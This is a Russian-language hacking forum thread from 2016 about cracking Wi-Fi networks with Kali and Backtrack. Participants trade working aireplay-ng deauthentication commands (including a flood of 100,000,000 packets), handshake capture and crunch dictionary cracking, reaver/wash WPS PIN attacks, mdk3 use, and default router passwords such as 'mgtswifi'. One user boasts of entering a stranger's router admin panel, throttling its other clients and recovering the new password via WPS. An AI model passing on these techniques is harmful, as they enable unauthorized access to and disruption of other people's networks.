aireplay-ng wlan0mon --deauth 5 -a XX:XX:XX:XX:XX:XX

Triton_Mgn
22.04.2016, 22:42
Вы наверно все время были под впечатлением Windows, на Backtrack, и последователь Kali они уже есть. Вернее на сам чип Ralink 3070, Вы попали в другой мир где не нужен драйвер?- Поздравляю.

Ну честно как знающий человек твержу, поставьте заново Kali- вы испортили манипуляциями работу чипа 3070. и не надо ставить никакие дрова- оно само жужжит.

К чему такой сильный инструмент? Kali

Triton_Mgn
22.04.2016, 22:47
BSSID - это MAC роутера, от его имени посылаются пакеты. Можно посылать конкретному клиенту, а если не указывать клиента, то отключать будет всех.

Как пример


aireplay-ng wlan0mon --deauth 5 -a XX:XX:XX:XX:XX:XX



почему 5?

nomy
22.04.2016, 23:14
BSSID - это MAC роутера, от его имени посылаются пакеты. Можно посылать конкретному клиенту, а если не указывать клиента, то отключать будет всех.

Как пример


aireplay-ng wlan0mon --deauth 5 -a XX:XX:XX:XX:XX:XX



ну это понятно, просто не стал посылать реконект не имея никого в сети

nomy
22.04.2016, 23:16
Вы наверно все время были под впечатлением Windows, на Backtrack, и последователь Kali они уже есть. Вернее на сам чип Ralink 3070, Вы попали в другой мир где не нужен драйвер?- Поздравляю.

Ну честно как знающий человек твержу, поставьте заново Kali- вы испортили манипуляциями работу чипа 3070. и не надо ставить никакие дрова- оно само жужжит.

К чему такой сильный инструмент? Kali



Хорошо попробую переставить Kali, и проверю заново будет ли показывать клиентов сети

Triton_Mgn
22.04.2016, 23:18
Хорошо попробую переставить Kali, и проверю заново будет ли показывать клиентов сети



Отпишитесь в этой теме, у нас такое впервые.

На awus036nh

atlas28
22.04.2016, 23:43
ну это понятно, просто не стал посылать реконект не имея никого в сети



Это не факт еще. Очень часто клиенты как бы спят и появляются как раз когда ты посылаешь broadcast deauth. Вообще не вижу смысла вот так ждать их появления в airodump'е. Ты никогда полной реальной картины не увидишь.



почему 5?



Для надежности) Можно и 10

Alexmeh
22.04.2016, 23:46
Можно и 10



При сильном сигнале, порой лучше ограничиться парой.

Но это сугубо личное мнение.

Triton_Mgn
22.04.2016, 23:46
Я думал ты как мы олдскул

aireplay-ng -0 100000000 -a xxxxxxxxxxxxx mon0

Пожалуйста перезагрузите роутер. --- Я настоятельно прошу

atlas28
22.04.2016, 23:52
При сильном сигнале, порой лучше ограничиться парой.

Но это сугубо личное мнение.



Ну мне то как правило и 1 хватает, просто раз автор говорит, что клиенты не появляются, то чтобы уже уверенным быть, что получены пакеты)))

А вообще я согласен, что лучше не посылать много пакетов подряд, т. к. больше шансов получить битый хендшейк (выбиваешь раньше, чем соединение установится).

Triton_Mgn
22.04.2016, 23:59
При сильном сигнале, порой лучше ограничиться парой.

Но это сугубо личное мнение.






Ну мне то как правило и 1 хватает, просто раз автор говорит, что клиенты не появляются, то чтобы уже уверенным быть, что получены пакеты)))

А вообще я согласен, что лучше не посылать много пакетов подряд, т. к. больше шансов получить битый хендшейк (выбиваешь раньше, чем соединение установится).



Иногда перезагруз роутера и дает хендшейк если далеко и телефоны.

nomy
23.04.2016, 00:36
Ну мне то как правило и 1 хватает, просто раз автор говорит, что клиенты не появляются, то чтобы уже уверенным быть, что получены пакеты)))

А вообще я согласен, что лучше не посылать много пакетов подряд, т. к. больше шансов получить битый хендшейк (выбиваешь раньше, чем соединение установится).



попробовал послать пакеты реконекта в пустоту результата ноль там где должно писаться про хендшейк пишется chanell fixed wlan0mon: и прыгают цифры (не -1 а именно положительные цифры)

так же что заметил в полном списке точек показываются некий список устройств с именем not assosiated

atlas28
23.04.2016, 00:52
попробовал послать пакеты реконекта в пустоту результата ноль там где должно писаться про хендшейк пишется chanell fixed wlan0mon: и прыгают цифры (не -1 а именно положительные цифры)

так же что заметил в полном списке точек показываются некий список устройств с именем not assosiated



Теперь понятно, в чем дело)


airmon-ng check kill
Это первое, что ты должен написать перед переводом карты в monitor mode.

Потому что wpa_supplicant удерживает интерфейс на определенном канале и не дает нормально работать airodump'у. Либо удостоверься, что не запущены какие-либо другие программы, которые могут использовать этот же интерфейс параллельно.

nomy
23.04.2016, 01:00
Теперь понятно, в чем дело)


airmon-ng check kill
Это первое, что ты должен написать перед переводом карты в monitor mode.

Потому что wpa_supplicant удерживает интерфейс на определенном канале и не дает нормально работать airodump'у. Либо удостоверься, что не запущены какие-либо другие программы, которые могут использовать этот же интерфейс параллельно.



а вот и не в чек кил если бы я его не выполнил мне бы просто не дало войти в режим мониторинга на счет параллельных программ не думаю запускаю с нуля ос и сразу же иду в терминал без запуска постороннего по

помимо прочего напрягают эти две строчки после которые пишутся вместе сразу после переведения в режим мониторинга (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

(mac80211 station mode vif disabled for [phy0]wlan0)

Triton_Mgn
23.04.2016, 01:06
хоть как бы пришлось это kali, в ней есть нюансы

atlas28
23.04.2016, 01:08
а вот и не в чек кил если бы я его не выполнил мне бы просто не дало войти в режим мониторинга на счет параллельных программ не думаю запускаю с нуля ос и сразу же иду в терминал без запуска постороннего по



Monitor mode то заведется, как бы там ни было, а вот сообщение о "fixed channel" явно говорит о том, что какое-то еще приложение использует данный интерфейс. Напиши ifconfig в терминале. aiкmon-ng check kill помимо того, что убивает мешающие процессы, еще и выключает интерфейс, а потом ты создаешь как бы отдельный в режиме monitor. Так вот, проверь, не включается ли тот, что работает в обычном режиме?

Грубо говоря, у тебя их получается 2: wlan0 и wlan0mon. wlan0 должен быть отключен, пока работает wlan0mon воизбежание проблем.

Я, кстати, так и не понял, какой дистрибутив ты используешь? kali?

Triton_Mgn
23.04.2016, 01:09
airmon-ng покажет что мешает

kill 1

kill 2

На Kali не заведется. Проверено

Triton_Mgn
23.04.2016, 01:12
может лучше у него спросить фото терминала, как он переводит девайс в такой режим.

kentuha
23.04.2016, 01:30
Если честно аналогичная проблема, только стоит убунту 16я

Не видно клиентов и все....

команда на общую деаунтификацию работает, сам проверял будучи в сети которую тестирую на взлом. но почему же не видны мать её клиенты. спецом повесил на wifi планшеты телефоны, те клиентов много.

Triton_Mgn
23.04.2016, 01:37
Если честно аналогичная проблема, только стоит убунту 16я

Не видно клиентов и все....

команда на общую деаунтификацию работает, сам проверял будучи в сети которую тестирую на взлом. но почему же не видны мать её клиенты. спецом повесил на wifi планшеты телефоны, те клиентов много.



А Вы хоть раз задумывались над софтом, что стоит постоянно, и готовый продукт, в коем вы и свми можете убедиться,. Зачем вам грузить Debian лишними пакетами и впридачу всеми остальными. ъ

Сделайте флешку за 5 минут, а еще лучше поставьте последний wifislax как систему , Slackware вам даст понять где на самом деле рога.

Triton_Mgn
23.04.2016, 01:58
просмотрев скрины, почему вы грешите на airodump, он вполне находит клиентов от других сетей, а в этой может и не быть. ваша карта работает как надо.

Triton_Mgn
23.04.2016, 02:16
В общем с дровами у вас все в порядке , используйте правильно интерфейс.

1 запускаешь айрмон- тушишь

2 запускаешь эйродамп -тушишь Ctrl+c

3- запускаешь эродамп с префиксом канала

4 запускаешь айреплей и смотришь на 3 пункт.

Triton_Mgn
23.04.2016, 02:17
зачем так тупить если есть Wifislax&

Triton_Mgn
23.04.2016, 02:27
Неужели надо напомнить, что наши поправки не были учтены, Kali переинсталированна?

nomy
23.04.2016, 02:31
Неужели надо напомнить, что наши поправки не были учтены, Kali переинсталированна?



сейчас этим и занимаюсь, может ли быть проблема в том что кали стоит в ВМ на макбуке?

Triton_Mgn
23.04.2016, 02:33
нет , не может, лучше бы вы поставили Backtrack 5 rc3 из торрентов

а не гнаться за новизной

nomy
23.04.2016, 02:34
нет , не может, лучше бы вы поставили Backtrack 5 rc3 из торрентов



вероятно придется позже попробовать если после переустановки kali ничего не поменяется

atlas28
23.04.2016, 02:37
вероятно придется позже попробовать если после переустановки kali ничего не поменяется



Хендшейк то не пойман... Попробуй дописать в параметрах запуска airodump'а (когда будешь слушать только одну точку) -w имя_файла и попробуй пару раз отключить клиентов. Залей сюда этот файл. Интересно, видны ли вообще пакеты от клиентов. Желательно на своей точке делай с подключенными клиентами.

Triton_Mgn
23.04.2016, 02:40
Дэжавю все умные, а то происходит -чем ловите? Антенна хоть есть?

nomy
23.04.2016, 03:09
мда переустановка не помогла, видимо стоит поискать бт

Triton_Mgn
23.04.2016, 03:31
http://zalil.su/4090756

nomy
23.04.2016, 04:12
http://zalil.su/4090756



нашел уже какую то) а какая разрядность вашей?

Triton_Mgn
23.04.2016, 04:56
32 наверно, , ведь все 16 Гб памяти мы не используем.

nomy
23.04.2016, 05:01
32 наверно, , ведь все 16 Гб памяти мы не используем.



к сожалению мак работает только с х64 кстати провел тест БТ5 клиентов и видит и рукопожатия ловит и даже небольшой словарь в crunch из 65к паролей прочекал и нашел верный. Правда теперь надо возиться с настройками разрешения экрана

Triton_Mgn
23.04.2016, 05:05
Ну в тему подбора кидай , там ребята посмотрят.

Triton_Mgn
23.04.2016, 05:08
к сожалению мак работает только с х64 кстати провел тест БТ5 клиентов и видит и рукопожатия ловит и даже небольшой словарь в crunch из 65к паролей прочекал и нашел верный. Правда теперь надо возиться с настройками разрешения экрана



осталось вкатить словари, мы помогли?

какая скорость перебора?

nomy
23.04.2016, 05:13
осталось вкатить словари, мы помогли?

какая скорость перебора?



700кб/с cлабо но хотя бы есть продвижение

Triton_Mgn
23.04.2016, 05:16
700кб/с cлабо но хотя бы есть продвижение



Все хорошо, ты молодец . Ты считаешь скорость продвижением? Nокс

nomy
23.04.2016, 05:18
Все хорошо, ты молодец . Ты считаешь скорость продвижением? Nокс



нет, всмысле продвижение с решением вопросов и получения необходимых результатов благодаря вашей помощи)

Triton_Mgn
23.04.2016, 05:23
Ну хорошо, спрашивайте.

fire-dance
26.04.2016, 22:43
Подскажите етот мак вотетой модели? 3С:47:11:E6:8F:90

Huawei E5186s-22a

не могу выяснить что за модель и вообще есть ли там wps протокол ,когда начинаю wps атаку пишет что сразу 90% и пин 0 в сек ето как замирание... сигнал -65

erwerr2321
26.04.2016, 23:03
Парни, а у кого был Connectify me крякнутый и без всяких прицепов?

Vikhedgehog
29.04.2016, 12:47
В последнее время кругом вижу сети со ssid "WirelessNet" без WPS и WPA2 по дифолту. Мак тот же, что у sercomm роутеров. Кто-нибудь знает, какого плана там пароли?

atlas28
29.04.2016, 13:59
В последнее время кругом вижу сети со ssid "WirelessNet" без WPS и WPA2 по дифолту. Мак тот же, что у sercomm роутеров. Кто-нибудь знает, какого плана там пароли?



Это МГТС роутеры, пароли точно не помню, но что-то вроде mgts****, при том не с цифрами, а во всем доме одинаковые стояли. Но, возможно, это только в том доме так.

Mistral
29.04.2016, 14:01
но что-то вроде mgts****



mgtswifi

binarymaster
29.04.2016, 15:18
В последнее время кругом вижу сети со ssid "WirelessNet" без WPS и WPA2 по дифолту. Мак тот же, что у sercomm роутеров. Кто-нибудь знает, какого плана там пароли?



Либо "mgtswifi", либо городской номер телефона (пример: 495#######).

Ещё бывают WirelessNet## с номером квартиры.

fire-dance
30.04.2016, 18:47
Чем лутше mdk3 делать атаку в wifislax если точка скрытая?

Linksach
02.05.2016, 19:39
Есть 2 сети.У одной сигнал 1-2 палки (TP-Link),у другой 3-4 палки(TrendNet).Так вот там где 3-4 палки инет по скорости явно тормозит в отличие от сети с 1-2 палками.Там где 1-2 палки клиентов бывает и до 4-5,там где 3-4 палки тормозит и при одном и без клиентов.В чём может быть причина?.И можно ли в роутере сделать чтоб у клиентов например инет явно тормозил или это дело рук провайдера.Кто знает объясните причину таких притормаживаний роутера.Притормаживания проявляются почти всегда,могу только предположить что хозяин роутера смотрит онлайн-фильмы или качает что-то весомое по размерах...

fire-dance
02.05.2016, 19:54
Есть 2 сети.У одной сигнал 1-2 палки (TP-Link),у другой 3-4 палки(TrendNet).Так вот там где 3-4 палки инет по скорости явно тормозит в отличие от сети с 1-2 палками.Там где 1-2 палки клиентов бывает и до 4-5,там где 3-4 палки тормозит и при одном и без клиентов.В чём может быть причина?.И можно ли в роутере сделать чтоб у клиентов например инет явно тормозил или это дело рук провайдера.Кто знает объясните причину таких притормаживаний роутера.Притормаживания проявляются почти всегда,могу только предположить что хозяин роутера смотрит онлайн-фильмы или качает что-то весомое по размерах...



Была у меня такая ситуация был в командировке, нада была нормальная скорость точка с норм скоростью была только 1,я через админку роутера сделал ограничение всех клиентов по скорости допустим 30 метров я сделал всем им по 3 метра месяц сидел пока пароль не сменили но пароль я уже узнал через 2 мин так как wps записан был

Linksach
02.05.2016, 20:51
Ну вот теперь хозяин роутера TrendNet задал пароль на вход user:user.И теперь я ничего не могу изменить в его роутере.И что теперь делать

fire-dance
02.05.2016, 21:24
Ну вот теперь хозяин роутера TrendNet задал пароль на вход user:user.И теперь я ничего не могу изменить в его роутере.И что теперь делать



значит хозяин умный попался,покупай антенку норм и лови намного дальше своего дома

fury_makers
03.05.2016, 17:01
Можна ли запустить Reaver под виндой?

Traffic_
03.05.2016, 18:55
Интересно чем можно настроить положение в пространстве для ловли хендшейка по сигналу клиента а не точки. Как правило если точку плохо видно, все же можно найти хорошее место с помощью airodump-ng, параметры PWR RXQ, но клиет меня не слышит.

Можно ли как то по MAC клиента задать фейковый канал связи с ним и наблюдать те же PWR RXQ?

on_eir_onaut
03.05.2016, 22:00
Всем здравствуйте. Захотелось вот купить

TOTOLINK A2000UA - у него 2 антенны 5 dBi. Если я вместо одной штатной антенны подключу одну направленную на 15 dBi, получу усиление сигнала по сравнению со штатными?

Сигнал будет приниматься с самой сильной или как?

devi_black
03.05.2016, 23:45
Интересно чем можно настроить положение в пространстве для ловли хендшейка по сигналу клиента а не точки. Как правило если точку плохо видно, все же можно найти хорошее место с помощью airodump-ng, параметры PWR RXQ, но клиет меня не слышит.

Можно ли как то по MAC клиента задать фейковый канал связи с ним и наблюдать те же PWR RXQ?



если вообще клиент виден хоть один то запустив деассоциацию менять положение антенны наблюдая за параметром ACK [0|23].

как только первое значение начнёт отличаться от ноля, значит там где то клиент. ну и ориентироваться по максимуму этих значений.

удобней если поставить число попыток деассоциации 0, чтобы они продолжались до тех пор пока сами не остановите.

Traffic_
04.05.2016, 16:02
если вообще клиент виден хоть один то запустив деассоциацию менять положение антенны наблюдая за параметром ACK [0|23].

как только первое значение начнёт отличаться от ноля, значит там где то клиент. ну и ориентироваться по максимуму этих значений.

удобней если поставить число попыток деассоциации 0, чтобы они продолжались до тех пор пока сами не остановите.



А в какой утилите это реализовано?

erwerr2321
04.05.2016, 16:05
А в какой утилите это реализовано?



aireplay-ng же ну..., там справа

http://www.nadejnei.net/lib/exe/fetch.php?media=deauth.png

mybitco
13.08.2016, 20:31
Не получается перебрать PIN от Wi-Fi с wps, поставил последний KALI(на флешку и с нее гружусь), в ноуте уже есть встроенный wi-fi, но я подключаю помощьнее по USB и не получается, помогите разобраться в чем проблема плс?

Вот порядок моих действий и ответ ОС:

root@kali:~# iwconfig

eth0 no wireless extensions.

wlan0 IEEE 802.11abg ESSIDff/any

Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm

Retry short limit:7 RTS thrff Fragment thrff

Encryption keyff

Power Managementff

lo no wireless extensions.

wlan1 IEEE 802.11bgn ESSIDff/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm

Retry short limit:7 RTS thrff Fragment thrff

Encryption keyff

Power Managementff

root@kali:~#

root@kali:~# airmon-ng check kill

Killing these processes:

PID Name

1278 wpa_supplicant

1301 dhclient

root@kali:~#

root@kali:~# airmon-ng check

root@kali:~#

root@kali:~# airmon-ng start wlan1

PHY Interface Driver Chipset

phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)

phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)

(mac80211 station mode vif disabled for [phy1]wlan1)

root@kali:~#

root@kali:~# airodump-ng wlan1mon

тут получаю полноценный список роутеров...

root@kali:~# wash -i wlan1mon

Wash v1.5.2 WiFi Protected Setup Scan Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

mod by t6_x & DataHead & Soxrok2212

BSSID Channel RSSI WPS Version WPS Locked ESSID

---------------------------------------------------------------------------------------------------------------

[!] Found packet with bad FCS, skipping...

[!] Found packet with bad FCS, skipping...

[!] Found packet with bad FCS, skipping...

^C

root@kali:~#

root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

mod by t6_x & DataHead & Soxrok2212

[+] Waiting for beacon from 00:11:22:33:44:55

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

^C

root@kali:~#

почему последние 2 команды не работают?

wash -i wlan1mon - тут я выкрутился с помощью смартфона он мне показал где открыт wps, но все-равно хочу добиться чтобы команда отработала.

reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w - тут я пробовал разные вариации параметров и все-равно перебор пина не начинается.

Подскажите в чем может быть проблема и все ли я правильно делал?

Kevin Shindel
13.08.2016, 21:31
wash -i wlan1mon -C

в случае с ривером ВОЗМОЖНО слабый сигнал...

mybitco
13.08.2016, 22:30
wash -i wlan1mon -C

в случае с ривером ВОЗМОЖНО слабый сигнал...



Это мне ответ? сигнал ОЧЕНЬ сильный

т.е. мне надо так подбор пина делать? : reaver -i wlan1mon -b 00:11:22:33:44:55 -C